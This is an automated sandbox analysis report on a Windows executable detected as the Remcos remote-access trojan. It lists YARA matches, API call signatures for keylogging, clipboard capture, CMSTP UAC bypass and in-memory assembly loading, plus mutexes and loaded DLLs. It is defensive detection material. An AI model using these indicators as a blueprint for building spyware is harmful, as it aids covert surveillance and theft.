                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000003_2_0040A2F3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B749
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168FC
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B749
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_0040A41B
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CA6D SystemParametersInfoW,3_2_0041CA6D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041CA73 SystemParametersInfoW,3_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,3_2_0041330D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,3_2_0041BBC6
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,3_2_0041BB9A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004167EF
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_027640F00_2_027640F0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_027652E70_2_027652E7
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_027656700_2_02765670
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B12B00_2_058B12B0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058BAE380_2_058BAE38
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B7E400_2_058B7E40
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B6B700_2_058B6B70
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058BB0B80_2_058BB0B8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058BB0C80_2_058BB0C8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B12A00_2_058B12A0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058BA2280_2_058BA228
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058BAE280_2_058BAE28
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B7E310_2_058B7E31
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B6B310_2_058B6B31
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 0_2_058B6B610_2_058B6B61
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043706A3_2_0043706A
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004140053_2_00414005
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043E11C3_2_0043E11C
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004541D93_2_004541D9
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004381E83_2_004381E8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041F18B3_2_0041F18B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004462703_2_00446270
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043E34B3_2_0043E34B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004533AB3_2_004533AB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0042742E3_2_0042742E
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004375663_2_00437566
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043E5A83_2_0043E5A8
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004387F03_2_004387F0
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043797E3_2_0043797E
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_004339D73_2_004339D7
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0044DA493_2_0044DA49
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00427AD73_2_00427AD7
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041DBF33_2_0041DBF3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00427C403_2_00427C40
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00437DB33_2_00437DB3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00435EEB3_2_00435EEB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0043DEED3_2_0043DEED
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00426E9F3_2_00426E9F
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: String function: 00434801 appears 41 times
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1713733444.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6Ctc0o7vhqKgjU7.exe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 6Ctc0o7vhqKgjU7.exe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1720728405.0000000009E00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 6Ctc0o7vhqKgjU7.exe
                  Source: 6Ctc0o7vhqKgjU7.exeBinary or memory string: OriginalFilenameIHh.exe: vs 6Ctc0o7vhqKgjU7.exe
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, d68QmCbgVnawm6LGVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@5/3@1/2
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_0041798D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040F4AF
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041B539
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AADB
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Ctc0o7vhqKgjU7.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-35QZU7
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 6Ctc0o7vhqKgjU7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 6Ctc0o7vhqKgjU7.exeReversingLabs: Detection: 34%
                  Source: 6Ctc0o7vhqKgjU7.exeString found in binary or memory: "images/addnew.png
                  Source: unknownProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeProcess created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 6Ctc0o7vhqKgjU7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 6Ctc0o7vhqKgjU7.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs.Net Code: sS9BYG5H8B System.Reflection.Assembly.Load(byte[])
